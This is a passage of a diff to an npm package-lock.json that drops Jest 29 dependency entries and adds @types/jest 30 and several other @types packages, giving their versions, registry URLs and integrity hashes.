"sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true - }, - "jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - } - }, - "p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "requires": { - "yocto-queue": "^0.1.0" - } - }, - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - }, - "write-file-atomic": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.0.tgz", - "integrity": "sha512-R7NYMnHSlV42K54lwY9lvW6MnSm1HSJqZL3xiSgi9E7//FYaI74r2G0rd+/X6VAMkHEdzxQaU5HUOXWUz5kA/w==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } - } - } - }, - "jest-runtime": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.4.1.tgz", - "integrity": "sha512-UXTMU9uKu2GjYwTtoAw5rn4STxWw/nadOfW7v1sx6LaJYa3V/iymdCLQM6xy3+7C6mY8GfX22vKpgxY171UIoA==", + "@types/jest": { + "version": "30.0.0", + "resolved": "https://registry.npmjs.org/@types/jest/-/jest-30.0.0.tgz", + "integrity": "sha512-XTYugzhuwqWjws0CVz8QpM36+T+Dz5mTEBKhNs/esGLnCIlGdRy+Dq78NRjd7ls7r8BC8ZRMOrKlkO1hU0JOwA==", "dev": true, "requires": { - "@jest/environment": "^29.4.1", - "@jest/fake-timers": "^29.4.1", - "@jest/globals": "^29.4.1", - "@jest/source-map": "^29.2.0", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-mock": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-resolve": "^29.4.1", - "jest-snapshot": "^29.4.1", - "jest-util": "^29.4.1", - "semver": "^7.3.5", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" + "expect": "^30.0.0", + "pretty-format": "^30.0.0" }, - "dependencies": { - "@jest/transform": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.4.1.tgz", - "integrity": "sha512-5w6YJrVAtiAgr0phzKjYd83UPbCXsBRTeYI4BXokv9Er9CcrH9hfXL/crCvP2d2nGOcovPUnlYiLPFLZrkG5Hg==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^5.0.0" - } - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true - }, - "jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - } - }, - "semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "requires": { - "lru-cache": "^6.0.0" - } - }, - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", + "dependencies": { + "@jest/expect-utils": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-30.0.4.tgz", + "integrity": "sha512-EgXecHDNfANeqOkcak0DxsoVI4qkDUsR7n/Lr2vtmTBjwLPBnnPOF71S11Q8IObWzxm2QgQoY6f9hzrRD3gHRA==", "dev": true, "requires": { - "has-flag": "^4.0.0" + "@jest/get-type": "30.0.1" } }, - "write-file-atomic": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.0.tgz", - "integrity": "sha512-R7NYMnHSlV42K54lwY9lvW6MnSm1HSJqZL3xiSgi9E7//FYaI74r2G0rd+/X6VAMkHEdzxQaU5HUOXWUz5kA/w==", + "@jest/schemas": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-30.0.1.tgz", + "integrity": "sha512-+g/1TKjFuGrf1Hh0QPCv0gISwBxJ+MQSNXmG9zjHy7BmFhtoJ9fdNhWJp3qUKRi93AOZHXtdxZgJ1vAtz6z65w==", "dev": true, "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" + "@sinclair/typebox": "^0.34.0" } - } - } - }, - "jest-snapshot": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.4.1.tgz", - "integrity": "sha512-l4iV8EjGgQWVz3ee/LR9sULDk2pCkqb71bjvlqn+qp90lFwpnulHj4ZBT8nm1hA1C5wowXLc7MGnw321u0tsYA==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/traverse": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/babel__traverse": "^7.0.6", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.4.1", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.4.1", - "jest-get-type": "^29.2.0", - "jest-haste-map": "^29.4.1", - "jest-matcher-utils": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1", - "natural-compare": "^1.4.0", - "pretty-format": "^29.4.1", - "semver": "^7.3.5" - }, - "dependencies": { - "@jest/transform": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.4.1.tgz", - "integrity": "sha512-5w6YJrVAtiAgr0phzKjYd83UPbCXsBRTeYI4BXokv9Er9CcrH9hfXL/crCvP2d2nGOcovPUnlYiLPFLZrkG5Hg==", + }, + "@jest/types": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/types/-/types-30.0.1.tgz", + "integrity": "sha512-HGwoYRVF0QSKJu1ZQX0o5ZrUrrhj0aOOFA8hXrumD7SIzjouevhawbTjmXdwOmURdGluU9DM/XvGm3NyFoiQjw==", "dev": true, "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^5.0.0" + "@jest/pattern": "30.0.1", + "@jest/schemas": "30.0.1", + "@types/istanbul-lib-coverage": "^2.0.6", + "@types/istanbul-reports": "^3.0.4", + "@types/node": "*", + "@types/yargs": "^17.0.33", + "chalk": "^4.1.2" } }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", + "@sinclair/typebox": { + "version": "0.34.37", + "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.34.37.tgz", + "integrity": "sha512-2TRuQVgQYfy+EzHRTIvkhv2ADEouJ2xNS/Vq+W5EuuewBdOrvATvljZTxHWZSTYr2sTjTHpGvucaGAt67S2akw==", + "dev": true + }, + "ansi-styles": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", + "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", "dev": true }, - "diff-sequences": { - "version": "29.3.1", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.3.1.tgz", - "integrity": "sha512-hlM3QR272NXCi4pq+N4Kok4kOp6EsgOM3ZSpJI7Da3UAs+Ttsi8MRmB6trM/lhyzUxGfOgnpkHtgqm5Q/CTcfQ==", + "ci-info": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-4.3.0.tgz", + "integrity": "sha512-l+2bNRMiQgcfILUi33labAZYIWlH1kWDp+ecNo5iisRKrbm0xcRyCww71/YU0Fkw0mAFpz9bJayXPjey6vkmaQ==", "dev": true }, - "jest-diff": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.4.1.tgz", - "integrity": "sha512-uazdl2g331iY56CEyfbNA0Ut7Mn2ulAG5vUaEHXycf1L6IPyuImIxSz4F0VYBKi7LYIuxOwTZzK3wh5jHzASMw==", + "expect": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/expect/-/expect-30.0.4.tgz", + "integrity": "sha512-dDLGjnP2cKbEppxVICxI/Uf4YemmGMPNy0QytCbfafbpYk9AFQsxb8Uyrxii0RPK7FWgLGlSem+07WirwS3cFQ==", "dev": true, "requires": { - "chalk": "^4.0.0", - "diff-sequences": "^29.3.1", - "jest-get-type": "^29.2.0", - "pretty-format": "^29.4.1" + "@jest/expect-utils": "30.0.4", + "@jest/get-type": "30.0.1", + "jest-matcher-utils": "30.0.4", + "jest-message-util": "30.0.2", + "jest-mock": "30.0.2", + "jest-util": "30.0.2" } }, - "jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true - }, - "jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", + "jest-matcher-utils": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-30.0.4.tgz", + "integrity": "sha512-ubCewJ54YzeAZ2JeHHGVoU+eDIpQFsfPQs0xURPWoNiO42LGJ+QGgfSf+hFIRplkZDkhH5MOvuxHKXRTUU3dUQ==", "dev": true, "requires": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" + "@jest/get-type": "30.0.1", + "chalk": "^4.1.2", + "jest-diff": "30.0.4", + "pretty-format": "30.0.2" } }, - "jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true - }, - "jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", + "jest-message-util": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-30.0.2.tgz", + "integrity": "sha512-vXywcxmr0SsKXF/bAD7t7nMamRvPuJkras00gqYeB1V0WllxZrbZ0paRr3XqpFU2sYYjD0qAaG2fRyn/CGZ0aw==", "dev": true, "requires": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" + "@babel/code-frame": "^7.27.1", + "@jest/types": "30.0.1", + "@types/stack-utils": "^2.0.3", + "chalk": "^4.1.2", + "graceful-fs": "^4.2.11", + "micromatch": "^4.0.8", + "pretty-format": "30.0.2", + "slash": "^3.0.0", + "stack-utils": "^2.0.6" } }, - "semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "jest-mock": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-30.0.2.tgz", + "integrity": "sha512-PnZOHmqup/9cT/y+pXIVbbi8ID6U1XHRmbvR7MvUy4SLqhCbwpkmXhLbsWbGewHrV5x/1bF7YDjs+x24/QSvFA==", "dev": true, "requires": { - "lru-cache": "^6.0.0" + "@jest/types": "30.0.1", + "@types/node": "*", + "jest-util": "30.0.2" } }, - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", + "jest-util": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-30.0.2.tgz", + "integrity": "sha512-8IyqfKS4MqprBuUpZNlFB5l+WFehc8bfCe1HSZFHzft2mOuND8Cvi9r1musli+u6F3TqanCZ/Ik4H4pXUolZIg==", "dev": true, "requires": { - "has-flag": "^4.0.0" + "@jest/types": "30.0.1", + "@types/node": "*", + "chalk": "^4.1.2", + "ci-info": "^4.2.0", + "graceful-fs": "^4.2.11", + "picomatch": "^4.0.2" } }, - "write-file-atomic": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.0.tgz", - "integrity": "sha512-R7NYMnHSlV42K54lwY9lvW6MnSm1HSJqZL3xiSgi9E7//FYaI74r2G0rd+/X6VAMkHEdzxQaU5HUOXWUz5kA/w==", + "picomatch": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.2.tgz", + "integrity": "sha512-M7BAV6Rlcy5u+m6oPhAPFgJTzAioX/6B0DxyvDlo9l8+T3nLKbrczg2WLUyzd45L8RqfUMyGPzekbMvX2Ldkwg==", + "dev": true + }, + "pretty-format": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-30.0.2.tgz", + "integrity": "sha512-yC5/EBSOrTtqhCKfLHqoUIAXVRZnukHPwWBJWR7h84Q3Be1DRQZLncwcfLoPA5RPQ65qfiCMqgYwdUuQ//eVpg==", "dev": true, "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" + "@jest/schemas": "30.0.1", + "ansi-styles": "^5.2.0", + "react-is": "^18.3.1" } } } }, - "jest-util": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.4.1.tgz", - "integrity": "sha512-bQy9FPGxVutgpN4VRc0hk6w7Hx/m6L53QxpDreTZgJd9gfx/AV2MjyPde9tGyZRINAUrSv57p2inGBu2dRLmkQ==", + "@types/js-yaml": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.2.tgz", + "integrity": "sha512-KbeHS/Y4R+k+5sWXEYzAZKuB1yQlZtEghuhRxrVRLaqhtoG5+26JwQsa4HyS3AWX8v1Uwukma5HheduUDskasA==" + }, + "@types/lodash": { + "version": "4.14.172", + "resolved": "https://registry.npmjs.org/@types/lodash/-/lodash-4.14.172.tgz", + "integrity": "sha512-/BHF5HAx3em7/KkzVKm3LrsD6HZAXuXO1AJZQ3cRRBZj4oHZDviWPYu0aEplAqDFNHZPW6d3G7KN+ONcCCC7pw==", + "dev": true + }, + "@types/lodash-es": { + "version": "4.17.12", + "resolved": "https://registry.npmjs.org/@types/lodash-es/-/lodash-es-4.17.12.tgz", + "integrity": "sha512-0NgftHUcV4v34VhXm8QBSftKVXtbkBG3ViCjs6+eJ5a6y6Mi/jiFGPc1sC7QK+9BFhWrURE3EOggmWaSxL9OzQ==", "dev": true, "requires": { - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" + "@types/lodash": "*" } }, - "jest-validate": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.4.1.tgz", - "integrity": "sha512-qNZXcZQdIQx4SfUB/atWnI4/I2HUvhz8ajOSYUu40CSmf9U5emil8EDHgE7M+3j9/pavtk3knlZBDsgFvv/SWw==", + "@types/mustache": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/@types/mustache/-/mustache-4.1.2.tgz", + "integrity": "sha512-c4OVMMcyodKQ9dpwBwh3ofK9P6U9ZktKU9S+p33UqwMNN1vlv2P0zJZUScTshnx7OEoIIRcCFNQ904sYxZz8kg==", + "dev": true + }, + "@types/node": { + "version": "22.16.2", + "resolved": "https://registry.npmjs.org/@types/node/-/node-22.16.2.tgz", + "integrity": "sha512-Cdqa/eJTvt4fC4wmq1Mcc0CPUjp/Qy2FGqLza3z3pKymsI969TcZ54diNJv8UYUgeWxyb8FSbCkhdR6WqmUFhA==", "dev": true, "requires": { - "@jest/types": "^29.4.1", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.2.0", - "leven": "^3.1.0", - "pretty-format": "^29.4.1" - }, - "dependencies": { - "camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true - }, - "jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true - } + "undici-types": "~6.21.0" } }, - "jest-watcher": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.4.1.tgz", - "integrity": "sha512-vFOzflGFs27nU6h8dpnVRER3O2rFtL+VMEwnG0H3KLHcllLsU8y9DchSh0AL/Rg5nN1/wSiQ+P4ByMGpuybaVw==", + "@types/node-fetch": { + "version": "2.6.12", + "resolved": "https://registry.npmjs.org/@types/node-fetch/-/node-fetch-2.6.12.tgz", + "integrity": "sha512-8nneRWKCg3rMtF69nLQJnOYUcbafYeFSjqkw3jCRLsqkWFlHaoQrr5mXmofFGOx3DKn7UfmBMyov8ySvLRVldA==", "dev": true, "requires": { - "@jest/test-result": "^29.4.1", - "@jest/types": "^29.4.1", "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.4.1", - "string-length": "^4.0.1" + "form-data": "^4.0.0" } }, - "jose": { - "version": "4.15.5", - "resolved": "https://registry.npmjs.org/jose/-/jose-4.15.5.tgz", - "integrity": "sha512-jc7BFxgKPKi94uOvEmzlSWFFe2+vASyXaKUpdQKatWAESU2MWjDfFf0fdfc83CDKcA5QecabZeNLyfhe3yKNkg==", - "optional": true - }, - "js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "js-yaml": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", - "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", + "@types/nodemailer": { + "version": "6.4.4", + "resolved": "https://registry.npmjs.org/@types/nodemailer/-/nodemailer-6.4.4.tgz", + "integrity": "sha512-Ksw4t7iliXeYGvIQcSIgWQ5BLuC/mljIEbjf615svhZL10PE9t+ei8O9gDaD3FPCasUJn9KTLwz2JFJyiiyuqw==", + "dev": true, "requires": { - "argparse": "^2.0.1" + "@types/node": "*" } }, - "jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha1-peZUwuWi3rXyAdls77yoDA7y9RM=" - }, - "jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", + "@types/nunjucks": { + "version": "3.1.5", + "resolved": "https://registry.npmjs.org/@types/nunjucks/-/nunjucks-3.1.5.tgz", + "integrity": "sha512-0zEdmQNNvQ+xyV9kqQvAV93UVroTwhE78toVUDT0GBnGcW2jQBZnB4al9qq2LqI5qHOqROy/DvvAY/UwrbvV1A==", "dev": true }, - "json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", + "@types/stack-utils": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.3.tgz", + "integrity": "sha512-9aEbYZ3TbYMznPdcdr3SmIrLXwC/AKZXQeCf9Pgao5CKb8CyHuEX5jzWPTkvregvhRJHcpRO6BFoGW9ycaOkYw==", "dev": true }, - "json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" - }, - "json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" + "@types/stream-buffers": { + "version": "3.0.7", + "resolved": "https://registry.npmjs.org/@types/stream-buffers/-/stream-buffers-3.0.7.tgz", + "integrity": "sha512-azOCy05sXVXrO+qklf0c/B07H/oHaIuDDAiHPVwlk3A9Ek+ksHyTeMajLZl3r76FxpPpxem//4Te61G1iW3Giw==", + "dev": true, + "requires": { + "@types/node": "*" + } }, - "json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha1-Epai1Y/UXxmg9s4B1lcB4sc1tus=" + "@types/yargs": { + "version": "17.0.33", + "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.33.tgz", + "integrity": "sha512-WpxBCKWPLr4xSsHgz511rFJAM+wS28w2zEO1QDNY5zM/S8ok70NNfztH0xwhqKyaK0OHCbN98LDAZuy1ctxDkA==", + "dev": true, + "requires": { + "@types/yargs-parser": "*" + } }, - "json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", + "@types/yargs-parser": { + "version": "20.2.1", + "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-20.2.1.tgz", + "integrity": "sha512-7tFImggNeNBVMsn0vLrpn1H1uPrUBdnARPTpZoitY37ZrdJREzf7I16tMrlK3hen349gr1NYh8CmZQa7CTG6Aw==", "dev": true }, - "jsonpath-plus": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-7.2.0.tgz", - "integrity": "sha512-zBfiUPM5nD0YZSBT/o/fbCUlCcepMIdP0CJZxM1+KgA4f2T206f6VAg9e7mX35+KlMaIc5qXW34f3BnwJ3w+RA==" + "a-sync-waterfall": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/a-sync-waterfall/-/a-sync-waterfall-1.0.1.tgz", + "integrity": "sha512-RYTOHHdWipFUliRFMCS4X2Yn2X8M87V/OpSqWzKKOGhzqyUxzyVmhHDH9sAvG+ZuQf/TAOFsLCpMw09I1ufUnA==" + }, + "agent-base": { + "version": "7.1.4", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.4.tgz", + "integrity": "sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ==", + "dev": true }, - "jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", + "ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": 